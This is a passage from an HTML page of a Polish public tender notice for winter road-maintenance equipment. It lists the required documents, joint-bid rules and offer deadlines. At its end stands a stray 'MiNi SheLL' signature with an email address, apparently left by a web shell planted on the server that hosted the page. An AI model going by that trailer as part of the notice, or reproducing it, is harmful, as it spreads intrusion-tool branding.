na mieszankę piaskowo-solną) min. 8 ton – 1 szt. <br/>- pługi minimum średnie sterowane hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu – 1 szt.<br/>- nośniki - samochody o ładowności min. 16 ton (dwie osie napędowe) na które zamontowane zostaną piaskarki – 1 szt.<br/>- lub ciągnik rolniczy z napędem na dwie osie o mocy 115 KM i osiągającym prędkość min. 40 km/godz. na który zamontowane zostaną piaskarki – 2 szt. <br/><br/>Zadanie nr 5<br/>- samochód ciężarowy lub ciągnik rolniczy – 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę Wykonawcy powinny składać się co najmniej następujące dokumenty (wskazane w Rozdziale 12 ust. 1 SWZ):<br/>1)	Formularz ofertowy, wskazany w rozdziale 12 ust. 1 pkt. 1 SWZ wraz z formularzem cenowym (załącznik nr 1 i załącznik 1.1 – 1.5 do SWZ);<br/>2)	Oświadczenie Wykonawcy, wskazane w rozdziale 12 ust. 1 pkt 2 SWZ (załącznik nr 2 do SWZ);<br/>3)	Oświadczenie podmiotu udostępniającego zasoby, wskazane w rozdziale 12 ust. 1 pkt 3 SWZ (załącznik nr 3 do SWZ, jeżeli dotyczy);<br/>4)	Oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni Wykonawcy, wskazane w rozdziale 12 ust. 1 pkt 4 SWZ (załącznik nr 4 do SWZ, jeżeli dotyczy);<br/>5)	Zobowiązanie podmiotu trzeciego wskazane w rozdziale 12 ust. 1 pkt 5 SWZ (załącznik nr 5 do SWZ, jeżeli dotyczy);<br/>6)	Dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (w przypadku gdy dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w art. 125 ust. 1 (załącznik nr 2 do SWZ) - o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty, oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni Wykonawcy zgodnie z art. 117 ust. 4 ustawy Pzp (załącznik nr 4 do SWZ).<br/>5.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Istotne postanowienia umowy zawarte zostały we wzorze umowy – załączniku nr 7 do SWZ.<br/>2.	Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane jedynie w formie pisemnej w postaci aneksu do umowy, pod rygorem nieważności. <br/>3.	Zakres oraz warunki dopuszczalnych zmian umowy zawarte są we wzorze umowy.<br/>4.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze umowy.<br/>5.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-24 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę, za pośrednictwem Formularza składania oferty dostępnego na https://platformazakupowa.pl/pn/powiatwolowski w konkretnym postępowaniu w sprawie udzielenia zamówienia publicznego.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-24 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com